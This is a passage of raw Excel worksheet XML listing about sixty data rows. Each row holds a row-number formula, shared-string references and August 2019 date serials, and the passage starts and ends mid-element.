        <v>1831</v>
      </c>
      <c r="C1832" t="s">
        <v>3</v>
      </c>
      <c r="D1832" s="1">
        <v>43708</v>
      </c>
      <c r="E1832" t="s">
        <v>3659</v>
      </c>
      <c r="F1832" t="s">
        <v>9975</v>
      </c>
      <c r="G1832" t="s">
        <v>3660</v>
      </c>
    </row>
    <row r="1833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1833">
        <f t="shared" si="28"/>
        <v>1832</v>
      </c>
      <c r="B1833">
        <v>1832</v>
      </c>
      <c r="C1833" t="s">
        <v>3</v>
      </c>
      <c r="D1833" s="1">
        <v>43685</v>
      </c>
      <c r="E1833" t="s">
        <v>3661</v>
      </c>
      <c r="F1833" t="s">
        <v>9975</v>
      </c>
      <c r="G1833" t="s">
        <v>3662</v>
      </c>
    </row>
    <row r="1834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1834">
        <f t="shared" si="28"/>
        <v>1833</v>
      </c>
      <c r="B1834">
        <v>1833</v>
      </c>
      <c r="C1834" t="s">
        <v>3</v>
      </c>
      <c r="D1834" s="1">
        <v>43679</v>
      </c>
      <c r="E1834" t="s">
        <v>3663</v>
      </c>
      <c r="F1834" t="s">
        <v>9975</v>
      </c>
      <c r="G1834" t="s">
        <v>3664</v>
      </c>
    </row>
    <row r="1835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1835">
        <f t="shared" si="28"/>
        <v>1834</v>
      </c>
      <c r="B1835">
        <v>1834</v>
      </c>
      <c r="C1835" t="s">
        <v>3</v>
      </c>
      <c r="D1835" s="1">
        <v>43693</v>
      </c>
      <c r="E1835" t="s">
        <v>3665</v>
      </c>
      <c r="F1835" t="s">
        <v>9975</v>
      </c>
      <c r="G1835" t="s">
        <v>3666</v>
      </c>
    </row>
    <row r="1836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1836">
        <f t="shared" si="28"/>
        <v>1835</v>
      </c>
      <c r="B1836">
        <v>1835</v>
      </c>
      <c r="C1836" t="s">
        <v>3</v>
      </c>
      <c r="D1836" s="1">
        <v>43693</v>
      </c>
      <c r="E1836" t="s">
        <v>3667</v>
      </c>
      <c r="F1836" t="s">
        <v>9975</v>
      </c>
      <c r="G1836" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="1837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1837">
        <f t="shared" si="28"/>
        <v>1836</v>
      </c>
      <c r="B1837">
        <v>1836</v>
      </c>
      <c r="C1837" t="s">
        <v>3</v>
      </c>
      <c r="D1837" s="1">
        <v>43700</v>
      </c>
      <c r="E1837" t="s">
        <v>3669</v>
      </c>
      <c r="F1837" t="s">
        <v>9975</v>
      </c>
      <c r="G1837" t="s">
        <v>3670</v>
      </c>
    </row>
    <row r="1838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1838">
        <f t="shared" si="28"/>
        <v>1837</v>
      </c>
      <c r="B1838">
        <v>1837</v>
      </c>
      <c r="C1838" t="s">
        <v>3</v>
      </c>
      <c r="D1838" s="1">
        <v>43698</v>
      </c>
      <c r="E1838" t="s">
        <v>3671</v>
      </c>
      <c r="F1838" t="s">
        <v>9975</v>
      </c>
      <c r="G1838" t="s">
        <v>3672</v>
      </c>
    </row>
    <row r="1839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1839">
        <f t="shared" si="28"/>
        <v>1838</v>
      </c>
      <c r="B1839">
        <v>1838</v>
      </c>
      <c r="C1839" t="s">
        <v>3</v>
      </c>
      <c r="D1839" s="1">
        <v>43685</v>
      </c>
      <c r="E1839" t="s">
        <v>3673</v>
      </c>
      <c r="F1839" t="s">
        <v>10021</v>
      </c>
      <c r="G1839" t="s">
        <v>3674</v>
      </c>
    </row>
    <row r="1840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1840">
        <f t="shared" si="28"/>
        <v>1839</v>
      </c>
      <c r="B1840">
        <v>1839</v>
      </c>
      <c r="C1840" t="s">
        <v>3</v>
      </c>
      <c r="D1840" s="1">
        <v>43705</v>
      </c>
      <c r="E1840" t="s">
        <v>3675</v>
      </c>
      <c r="F1840" t="s">
        <v>9975</v>
      </c>
      <c r="G1840" t="s">
        <v>3676</v>
      </c>
    </row>
    <row r="1841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1841">
        <f t="shared" si="28"/>
        <v>1840</v>
      </c>
      <c r="B1841">
        <v>1840</v>
      </c>
      <c r="C1841" t="s">
        <v>3</v>
      </c>
      <c r="D1841" s="1">
        <v>43682</v>
      </c>
      <c r="E1841" t="s">
        <v>3677</v>
      </c>
      <c r="F1841" t="s">
        <v>10021</v>
      </c>
      <c r="G1841" t="s">
        <v>3678</v>
      </c>
    </row>
    <row r="1842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1842">
        <f t="shared" si="28"/>
        <v>1841</v>
      </c>
      <c r="B1842">
        <v>1841</v>
      </c>
      <c r="C1842" t="s">
        <v>3</v>
      </c>
      <c r="D1842" s="1">
        <v>43684</v>
      </c>
      <c r="E1842" t="s">
        <v>3679</v>
      </c>
      <c r="F1842" t="s">
        <v>10021</v>
      </c>
      <c r="G1842" t="s">
        <v>3680</v>
      </c>
    </row>
    <row r="1843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1843">
        <f t="shared" si="28"/>
        <v>1842</v>
      </c>
      <c r="B1843">
        <v>1842</v>
      </c>
      <c r="C1843" t="s">
        <v>3</v>
      </c>
      <c r="D1843" s="1">
        <v>43691</v>
      </c>
      <c r="E1843" t="s">
        <v>3681</v>
      </c>
      <c r="F1843" t="s">
        <v>9975</v>
      </c>
      <c r="G1843" t="s">
        <v>3682</v>
      </c>
    </row>
    <row r="1844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1844">
        <f t="shared" si="28"/>
        <v>1843</v>
      </c>
      <c r="B1844">
        <v>1843</v>
      </c>
      <c r="C1844" t="s">
        <v>3</v>
      </c>
      <c r="D1844" s="1">
        <v>43689</v>
      </c>
      <c r="E1844" t="s">
        <v>3683</v>
      </c>
      <c r="F1844" t="s">
        <v>10021</v>
      </c>
      <c r="G1844" t="s">
        <v>3684</v>
      </c>
    </row>
    <row r="1845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1845">
        <f t="shared" si="28"/>
        <v>1844</v>
      </c>
      <c r="B1845">
        <v>1844</v>
      </c>
      <c r="C1845" t="s">
        <v>3</v>
      </c>
      <c r="D1845" s="1">
        <v>43681</v>
      </c>
      <c r="E1845" t="s">
        <v>3685</v>
      </c>
      <c r="F1845" t="s">
        <v>9975</v>
      </c>
      <c r="G1845" t="s">
        <v>3686</v>
      </c>
    </row>
    <row r="1846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1846">
        <f t="shared" si="28"/>
        <v>1845</v>
      </c>
      <c r="B1846">
        <v>1845</v>
      </c>
      <c r="C1846" t="s">
        <v>3</v>
      </c>
      <c r="D1846" s="1">
        <v>43692</v>
      </c>
      <c r="E1846" t="s">
        <v>3687</v>
      </c>
      <c r="F1846" t="s">
        <v>10021</v>
      </c>
      <c r="G1846" t="s">
        <v>3688</v>
      </c>
    </row>
    <row r="1847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1847">
        <f t="shared" si="28"/>
        <v>1846</v>
      </c>
      <c r="B1847">
        <v>1846</v>
      </c>
      <c r="C1847" t="s">
        <v>3</v>
      </c>
      <c r="D1847" s="1">
        <v>43692</v>
      </c>
      <c r="E1847" t="s">
        <v>3689</v>
      </c>
      <c r="F1847" t="s">
        <v>10021</v>
      </c>
      <c r="G1847" t="s">
        <v>3690</v>
      </c>
    </row>
    <row r="1848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1848">
        <f t="shared" si="28"/>
        <v>1847</v>
      </c>
      <c r="B1848">
        <v>1847</v>
      </c>
      <c r="C1848" t="s">
        <v>3</v>
      </c>
      <c r="D1848" s="1">
        <v>43705</v>
      </c>
      <c r="E1848" t="s">
        <v>3691</v>
      </c>
      <c r="F1848" t="s">
        <v>10021</v>
      </c>
      <c r="G1848" t="s">
        <v>3692</v>
      </c>
    </row>
    <row r="1849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1849">
        <f t="shared" si="28"/>
        <v>1848</v>
      </c>
      <c r="B1849">
        <v>1848</v>
      </c>
      <c r="C1849" t="s">
        <v>3</v>
      </c>
      <c r="D1849" s="1">
        <v>43693</v>
      </c>
      <c r="E1849" t="s">
        <v>3693</v>
      </c>
      <c r="F1849" t="s">
        <v>10021</v>
      </c>
      <c r="G1849" t="s">
        <v>3694</v>
      </c>
    </row>
    <row r="1850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1850">
        <f t="shared" si="28"/>
        <v>1849</v>
      </c>
      <c r="B1850">
        <v>1849</v>
      </c>
      <c r="C1850" t="s">
        <v>3</v>
      </c>
      <c r="D1850" s="1">
        <v>43692</v>
      </c>
      <c r="E1850" t="s">
        <v>3695</v>
      </c>
      <c r="F1850" t="s">
        <v>9975</v>
      </c>
      <c r="G1850" t="s">
        <v>3696</v>
      </c>
    </row>
    <row r="1851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1851">
        <f t="shared" si="28"/>
        <v>1850</v>
      </c>
      <c r="B1851">
        <v>1850</v>
      </c>
      <c r="C1851" t="s">
        <v>3</v>
      </c>
      <c r="D1851" s="1">
        <v>43695</v>
      </c>
      <c r="E1851" t="s">
        <v>3697</v>
      </c>
      <c r="F1851" t="s">
        <v>9975</v>
      </c>
      <c r="G1851" t="s">
        <v>3698</v>
      </c>
    </row>
    <row r="1852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1852">
        <f t="shared" si="28"/>
        <v>1851</v>
      </c>
      <c r="B1852">
        <v>1851</v>
      </c>
      <c r="C1852" t="s">
        <v>3</v>
      </c>
      <c r="D1852" s="1">
        <v>43705</v>
      </c>
      <c r="E1852" t="s">
        <v>3699</v>
      </c>
      <c r="F1852" t="s">
        <v>9975</v>
      </c>
      <c r="G1852" t="s">
        <v>3700</v>
      </c>
    </row>
    <row r="1853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1853">
        <f t="shared" si="28"/>
        <v>1852</v>
      </c>
      <c r="B1853">
        <v>1852</v>
      </c>
      <c r="C1853" t="s">
        <v>3</v>
      </c>
      <c r="D1853" s="1">
        <v>43708</v>
      </c>
      <c r="E1853" t="s">
        <v>3701</v>
      </c>
      <c r="F1853" t="s">
        <v>9975</v>
      </c>
      <c r="G1853" t="s">
        <v>3702</v>
      </c>
    </row>
    <row r="1854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1854">
        <f t="shared" si="28"/>
        <v>1853</v>
      </c>
      <c r="B1854">
        <v>1853</v>
      </c>
      <c r="C1854" t="s">
        <v>3</v>
      </c>
      <c r="D1854" s="1">
        <v>43692</v>
      </c>
      <c r="E1854" t="s">
        <v>3703</v>
      </c>
      <c r="F1854" t="s">
        <v>9975</v>
      </c>
      <c r="G1854" t="s">
        <v>3704</v>
      </c>
    </row>
    <row r="1855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1855">
        <f t="shared" si="28"/>
        <v>1854</v>
      </c>
      <c r="B1855">
        <v>1854</v>
      </c>
      <c r="C1855" t="s">
        <v>3</v>
      </c>
      <c r="D1855" s="1">
        <v>43699</v>
      </c>
      <c r="E1855" t="s">
        <v>3705</v>
      </c>
      <c r="F1855" t="s">
        <v>10021</v>
      </c>
      <c r="G1855" t="s">
        <v>3706</v>
      </c>
    </row>
    <row r="1856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1856">
        <f t="shared" si="28"/>
        <v>1855</v>
      </c>
      <c r="B1856">
        <v>1855</v>
      </c>
      <c r="C1856" t="s">
        <v>3</v>
      </c>
      <c r="D1856" s="1">
        <v>43704</v>
      </c>
      <c r="E1856" t="s">
        <v>3707</v>
      </c>
      <c r="F1856" t="s">
        <v>9975</v>
      </c>
      <c r="G1856" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="1857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1857">
        <f t="shared" si="28"/>
        <v>1856</v>
      </c>
      <c r="B1857">
        <v>1856</v>
      </c>
      <c r="C1857" t="s">
        <v>3</v>
      </c>
      <c r="D1857" s="1">
        <v>43698</v>
      </c>
      <c r="E1857" t="s">
        <v>3709</v>
      </c>
      <c r="F1857" t="s">
        <v>9978</v>
      </c>
      <c r="G1857" t="s">
        <v>3710</v>
      </c>
    </row>
    <row r="1858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1858">
        <f t="shared" si="28"/>
        <v>1857</v>
      </c>
      <c r="B1858">
        <v>1857</v>
      </c>
      <c r="C1858" t="s">
        <v>3</v>
      </c>
      <c r="D1858" s="1">
        <v>43701</v>
      </c>
      <c r="E1858" t="s">
        <v>3711</v>
      </c>
      <c r="F1858" t="s">
        <v>9975</v>
      </c>
      <c r="G1858" t="s">
        <v>3712</v>
      </c>
    </row>
    <row r="1859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1859">
        <f t="shared" ref="A1859:A1922" si="29">+ROW(A1858)</f>
        <v>1858</v>
      </c>
      <c r="B1859">
        <v>1858</v>
      </c>
      <c r="C1859" t="s">
        <v>3</v>
      </c>
      <c r="D1859" s="1">
        <v>43678</v>
      </c>
      <c r="E1859" t="s">
        <v>3713</v>
      </c>
      <c r="F1859" t="s">
        <v>9975</v>
      </c>
      <c r="G1859" t="s">
        <v>3714</v>
      </c>
    </row>
    <row r="1860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1860">
        <f t="shared" si="29"/>
        <v>1859</v>
      </c>
      <c r="B1860">
        <v>1859</v>
      </c>
      <c r="C1860" t="s">
        <v>3</v>
      </c>
      <c r="D1860" s="1">
        <v>43703</v>
      </c>
      <c r="E1860" t="s">
        <v>3715</v>
      </c>
      <c r="F1860" t="s">
        <v>10021</v>
      </c>
      <c r="G1860" t="s">
        <v>3716</v>
      </c>
    </row>
    <row r="1861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1861">
        <f t="shared" si="29"/>
        <v>1860</v>
      </c>
      <c r="B1861">
        <v>1860</v>
      </c>
      <c r="C1861" t="s">
        <v>3</v>
      </c>
      <c r="D1861" s="1">
        <v>43679</v>
      </c>
      <c r="E1861" t="s">
        <v>3717</v>
      </c>
      <c r="F1861" t="s">
        <v>9975</v>
      </c>
      <c r="G1861" t="s">
        <v>3718</v>
      </c>
    </row>
    <row r="1862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1862">
        <f t="shared" si="29"/>
        <v>1861</v>
      </c>
      <c r="B1862">
        <v>1861</v>
      </c>
      <c r="C1862" t="s">
        <v>3</v>
      </c>
      <c r="D1862" s="1">
        <v>43698</v>
      </c>
      <c r="E1862" t="s">
        <v>3719</v>
      </c>
      <c r="F1862" t="s">
        <v>9975</v>
      </c>
      <c r="G1862" t="s">
        <v>3720</v>
      </c>
    </row>
    <row r="1863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1863">
        <f t="shared" si="29"/>
        <v>1862</v>
      </c>
      <c r="B1863">
        <v>1862</v>
      </c>
      <c r="C1863" t="s">
        <v>3</v>
      </c>
      <c r="D1863" s="1">
        <v>43699</v>
      </c>
      <c r="E1863" t="s">
        <v>3721</v>
      </c>
      <c r="F1863" t="s">
        <v>9978</v>
      </c>
      <c r="G1863" t="s">
        <v>3722</v>
      </c>
    </row>
    <row r="1864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1864">
        <f t="shared" si="29"/>
        <v>1863</v>
      </c>
      <c r="B1864">
        <v>1863</v>
      </c>
      <c r="C1864" t="s">
        <v>3</v>
      </c>
      <c r="D1864" s="1">
        <v>43698</v>
      </c>
      <c r="E1864" t="s">
        <v>3723</v>
      </c>
      <c r="F1864" t="s">
        <v>10526</v>
      </c>
      <c r="G1864" t="s">
        <v>3724</v>
      </c>
    </row>
    <row r="1865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1865">
        <f t="shared" si="29"/>
        <v>1864</v>
      </c>
      <c r="B1865">
        <v>1864</v>
      </c>
      <c r="C1865" t="s">
        <v>3</v>
      </c>
      <c r="D1865" s="1">
        <v>43704</v>
      </c>
      <c r="E1865" t="s">
        <v>3725</v>
      </c>
      <c r="F1865" t="s">
        <v>9975</v>
      </c>
      <c r="G1865" t="s">
        <v>3726</v>
      </c>
    </row>
    <row r="1866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1866">
        <f t="shared" si="29"/>
        <v>1865</v>
      </c>
      <c r="B1866">
        <v>1865</v>
      </c>
      <c r="C1866" t="s">
        <v>3</v>
      </c>
      <c r="D1866" s="1">
        <v>43692</v>
      </c>
      <c r="E1866" t="s">
        <v>3727</v>
      </c>
      <c r="F1866" t="s">
        <v>9975</v>
      </c>
      <c r="G1866" t="s">
        <v>3728</v>
      </c>
    </row>
    <row r="1867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1867">
        <f t="shared" si="29"/>
        <v>1866</v>
      </c>
      <c r="B1867">
        <v>1866</v>
      </c>
      <c r="C1867" t="s">
        <v>3</v>
      </c>
      <c r="D1867" s="1">
        <v>43690</v>
      </c>
      <c r="E1867" t="s">
        <v>3729</v>
      </c>
      <c r="F1867" t="s">
        <v>9975</v>
      </c>
      <c r="G1867" t="s">
        <v>3730</v>
      </c>
    </row>
    <row r="1868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1868">
        <f t="shared" si="29"/>
        <v>1867</v>
      </c>
      <c r="B1868">
        <v>1867</v>
      </c>
      <c r="C1868" t="s">
        <v>3</v>
      </c>
      <c r="D1868" s="1">
        <v>43704</v>
      </c>
      <c r="E1868" t="s">
        <v>3731</v>
      </c>
      <c r="F1868" t="s">
        <v>9975</v>
      </c>
      <c r="G1868" t="s">
        <v>3732</v>
      </c>
    </row>
    <row r="1869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1869">
        <f t="shared" si="29"/>
        <v>1868</v>
      </c>
      <c r="B1869">
        <v>1868</v>
      </c>
      <c r="C1869" t="s">
        <v>3</v>
      </c>
      <c r="D1869" s="1">
        <v>43707</v>
      </c>
      <c r="E1869" t="s">
        <v>3733</v>
      </c>
      <c r="F1869" t="s">
        <v>9975</v>
      </c>
      <c r="G1869" t="s">
        <v>3734</v>
      </c>
    </row>
    <row r="1870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1870">
        <f t="shared" si="29"/>
        <v>1869</v>
      </c>
      <c r="B1870">
        <v>1869</v>
      </c>
      <c r="C1870" t="s">
        <v>3</v>
      </c>
      <c r="D1870" s="1">
        <v>43693</v>
      </c>
      <c r="E1870" t="s">
        <v>3735</v>
      </c>
      <c r="F1870" t="s">
        <v>9975</v>
      </c>
      <c r="G1870" t="s">
        <v>3736</v>
      </c>
    </row>
    <row r="1871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1871">
        <f t="shared" si="29"/>
        <v>1870</v>
      </c>
      <c r="B1871">
        <v>1870</v>
      </c>
      <c r="C1871" t="s">
        <v>3</v>
      </c>
      <c r="D1871" s="1">
        <v>43700</v>
      </c>
      <c r="E1871" t="s">
        <v>3737</v>
      </c>
      <c r="F1871" t="s">
        <v>10021</v>
      </c>
      <c r="G1871" t="s">
        <v>3738</v>
      </c>
    </row>
    <row r="1872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1872">
        <f t="shared" si="29"/>
        <v>1871</v>
      </c>
      <c r="B1872">
        <v>1871</v>
      </c>
      <c r="C1872" t="s">
        <v>3</v>
      </c>
      <c r="D1872" s="1">
        <v>43686</v>
      </c>
      <c r="E1872" t="s">
        <v>3739</v>
      </c>
      <c r="F1872" t="s">
        <v>9975</v>
      </c>
      <c r="G1872" t="s">
        <v>3740</v>
      </c>
    </row>
    <row r="1873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1873">
        <f t="shared" si="29"/>
        <v>1872</v>
      </c>
      <c r="B1873">
        <v>1872</v>
      </c>
      <c r="C1873" t="s">
        <v>3</v>
      </c>
      <c r="D1873" s="1">
        <v>43689</v>
      </c>
      <c r="E1873" t="s">
        <v>3741</v>
      </c>
      <c r="F1873" t="s">
        <v>10526</v>
      </c>
      <c r="G1873" t="s">
        <v>3742</v>
      </c>
    </row>
    <row r="1874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1874">
        <f t="shared" si="29"/>
        <v>1873</v>
      </c>
      <c r="B1874">
        <v>1873</v>
      </c>
      <c r="C1874" t="s">
        <v>3</v>
      </c>
      <c r="D1874" s="1">
        <v>43707</v>
      </c>
      <c r="E1874" t="s">
        <v>3743</v>
      </c>
      <c r="F1874" t="s">
        <v>9975</v>
      </c>
      <c r="G1874" t="s">
        <v>3744</v>
      </c>
    </row>
    <row r="1875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1875">
        <f t="shared" si="29"/>
        <v>1874</v>
      </c>
      <c r="B1875">
        <v>1874</v>
      </c>
      <c r="C1875" t="s">
        <v>3</v>
      </c>
      <c r="D1875" s="1">
        <v>43703</v>
      </c>
      <c r="E1875" t="s">
        <v>3745</v>
      </c>
      <c r="F1875" t="s">
        <v>10021</v>
      </c>
      <c r="G1875" t="s">
        <v>3746</v>
      </c>
    </row>
    <row r="1876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1876">
        <f t="shared" si="29"/>
        <v>1875</v>
      </c>
      <c r="B1876">
        <v>1875</v>
      </c>
      <c r="C1876" t="s">
        <v>3</v>
      </c>
      <c r="D1876" s="1">
        <v>43685</v>
      </c>
      <c r="E1876" t="s">
        <v>3747</v>
      </c>
      <c r="F1876" t="s">
        <v>9975</v>
      </c>
      <c r="G1876" t="s">
        <v>3748</v>
      </c>
    </row>
    <row r="1877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1877">
        <f t="shared" si="29"/>
        <v>1876</v>
      </c>
      <c r="B1877">
        <v>1876</v>
      </c>
      <c r="C1877" t="s">
        <v>3</v>
      </c>
      <c r="D1877" s="1">
        <v>43678</v>
      </c>
      <c r="E1877" t="s">
        <v>3749</v>
      </c>
      <c r="F1877" t="s">
        <v>9975</v>
      </c>
      <c r="G1877" t="s">
        <v>3750</v>
      </c>
    </row>
    <row r="1878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1878">
        <f t="shared" si="29"/>
        <v>1877</v>
      </c>
      <c r="B1878">
        <v>1877</v>
      </c>
      <c r="C1878" t="s">
        <v>3</v>
      </c>
      <c r="D1878" s="1">
        <v>43698</v>
      </c>
      <c r="E1878" t="s">
        <v>3751</v>
      </c>
      <c r="F1878" t="s">
        <v>9975</v>
      </c>
      <c r="G1878" t="s">
        <v>3752</v>
      </c>
    </row>
    <row r="1879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1879">
        <f t="shared" si="29"/>
        <v>1878</v>
      </c>
      <c r="B1879">
        <v>1878</v>
      </c>
      <c r="C1879" t="s">
        <v>3</v>
      </c>
      <c r="D1879" s="1">
        <v>43681</v>
      </c>
      <c r="E1879" t="s">
        <v>3753</v>
      </c>
      <c r="F1879" t="s">
        <v>10021</v>
      </c>
      <c r="G1879" t="s">
        <v>3754</v>
      </c>
    </row>
    <row r="1880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1880">
        <f t="shared" si="29"/>
        <v>1879</v>
      </c>
      <c r="B1880">
        <v>1879</v>
      </c>
      <c r="C1880" t="s">
        <v>3</v>
      </c>
      <c r="D1880" s="1">
        <v>43686</v>
      </c>
      <c r="E1880" t="s">
        <v>3755</v>
      </c>
      <c r="F1880" t="s">
        <v>10021</v>
      </c>
      <c r="G1880" t="s">
        <v>3756</v>
      </c>
    </row>
    <row r="1881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1881">
        <f t="shared" si="29"/>
        <v>1880</v>
      </c>
      <c r="B1881">
        <v>1880</v>
      </c>
      <c r="C1881" t="s">
        <v>3</v>
      </c>
      <c r="D1881" s="1">
        <v>43686</v>
      </c>
      <c r="E1881" t="s">
        <v>3757</v>
      </c>
      <c r="F1881" t="s">
        <v>9975</v>
      </c>
      <c r="G1881" t="s">
        <v>3758</v>
      </c>
    </row>
    <row r="1882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1882">
        <f t="shared" si="29"/>
        <v>1881</v>
      </c>
      <c r="B1882">
        <v>1881</v>
      </c>
      <c r="C1882" t="s">
        <v>3</v>
      </c>
      <c r="D1882" s="1">
        <v>43691</v>
      </c>
      <c r="E1882" t="s">
        <v>3759</v>
      </c>
      <c r="F1882" t="s">
        <v>9975</v>
      </c>
      <c r="G1882" t="s">
        <v>3760</v>
      </c>
    </row>
    <row r="1883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1883">
        <f t="shared" si="29"/>
        <v>1882</v>
      </c>
      <c r="B1883">
        <v>1882</v>
      </c>
      <c r="C1883" t="s">
        <v>3</v>
      </c>
      <c r="D1883" s="1">
        <v>43695</v>
      </c>
      <c r="E1883" t="s">
        <v>3761</v>
      </c>
      <c r="F1883" t="s">
        <v>9975</v>
      </c>
      <c r="G1883" t="s">
        <v>3762</v>
      </c>
    </row>
    <row r="1884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1884">
        <f t="shared" si="29"/>
        <v>1883</v>
      </c>
      <c r="B1884">
        <v>1883</v>
      </c>
      <c r="C1884" t="s">
        <v>3</v>
      </c>
      <c r="D1884" s="1">
        <v>43696</v>
      </c>
      <c r="E1884" t="s">
        <v>3763</v>
      </c>
      <c r="F1884" t="s">
        <v>9975</v>
      </c>
      <c r="G1884" t="s">
        <v>3764</v>
      </c>
    </row>
    <row r="1885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1885">
        <f t="shared" si="29"/>
        <v>1884</v>
      </c>
      <c r="B1885">
        <v>1884</v>
      </c>
      <c r="C1885" t="s">
        <v>3</v>
      </c>
      <c r="D1885" s="1">
        <v>43694</v>
      </c>
      <c r="E1885" t="s">
        <v>3765</v>
      </c>
      <c r="F1885" t="s">
        <v>9975</v>
      </c>
      <c r="G1885" t="s">
        <v>3766</v>
      </c>
    </row>
    <row r="1886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1886">
        <f t="shared" si="29"/>
        <v>1885</v>
      </c>
      <c r="B1886">
        <v>1885</v>
      </c>
      <c r="C1886" t="s">
        <v>3</v>
      </c>
      <c r="D1886" s="1">
        <v>43683</v>
      </c>
      <c r="E1886" t="s">
        <v>3767</v>
      </c>
      <c r="F1886" t="s">
        <v>9975</v>
      </c>
      <c r="G1886" t="s">
        <v>3768</v>
      </c>
    </row>
    <row r="1887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1887">
        <f t="shared" si="29"/>
        <v>1886</v>
      </c>
      <c r="B1887">
        <v>1886</v>
      </c>
      <c r="C1887" t="s">
        <v>3</v>
      </c>
      <c r="D1887" s="1">
        <v>43693</v>
      </c>
      <c r="E1887" t="s">
        <v>3769</v>
      </c>
      <c r="F1887" t="s">
        <v>9975</v>
      </c>
      <c r="G1887" t="s">
        <v>3770</v>
      </c>
    </row>
    <row r="1888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1888">
        <f t="shared" si="29"/>
        <v>1887</v>
      </c>
      <c r="B1888">
        <v>1887</v>
      </c>
      <c r="C1888" t="s">
        <v>3</v>
      </c>
      <c r="D1888" s="1">
        <v>43699</v>
      </c>
      <c r="E1888" t="s">
        <v>3771</v>
      </c>
      <c r="F1888" t="s">
        <v>9975</v>
      </c>
      <c r="G1888" t="s">
        <v>3772</v>
      </c>
    </row>
    <row r="1889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1889">
        <f t="shared" si="29"/>
        <v>1888</v>
      </c>
      <c r="B1889">
        <v>1888</v>
      </c>
      <c r="C1889" t="s">
        <v>3</v>
      </c>
      <c r="D1889" s="1">
        <v>43679</v>
      </c>
      <c r="E1889" t="s">
        <v>3773</v>
      </c>
      <c r="F1889" t="s">
        <v>9975</v>
      </c>
      <c r="G1889" t="s">
        <v>3774</v>
      </c>
    </row>
    <row r="1890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1890">
        <f t="shared" si="29"/>
        <v>1889</v>
      </c>
      <c r="B1890">
        <v>1889</v>
      </c>
      <c r="C1890" t="s">
        <v>3</v>
      </c>
      <c r="D1890" s="1">
        <v>43679</v>
      </c>
      <c r="E1890" t="s">
        <v>3775</v>
      </c>
      <c r="F1890" t="s">
        <v>9975</v>
      </c>
      <c r="G1890" t="s">
        <v>3776</v>
      </c>
    </row>
    <row r="1891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1891">
        <f t="shared" si="29"/>
        <v>1890</v>
      </c>
      <c r="B1891">
        <v>1890</v>
      </c>
      <c r="C1891" t="s">
        <v>3</v>
      </c>
      <c r="D1891" s="1">
        <v>43689</v>
      </c>
      <c r="E1891" t="s">
        <v>3777</v>
      </c>
      <c r="F1891" t="s">
        <v>9975</v>
      </c>
      <c r="G1891" t="s">
        <v>3778</v>
      </c>
    </row>
    <row r="1892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1892">
        <f t="shared" si="29"/>
        <v>1891</v>
      </c>
      <c r="B1892">
        <v>1891</v>
      </c>
      <c r="C1892" t="s">
        <v>3</v>
      </c>
      <c r="D1892" s="1">
        <v>43700</v>
      </c>
      <c r="E1892" t="s">
        <v>3779</v>
      </c>
      <c r="F1892" t="s">
        <v>10021</v>
      </c>
      <c r="G1892" t="s">
        <v>3780</v>
      </c>
    </row>
    <row r="1893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1893">
        <f t="shared" si="29"/>
        <v>1892</v>
      </c>
      <c r="B1893">
        <v>1892</v>
      </c>
      <c r="C1893" t="s">
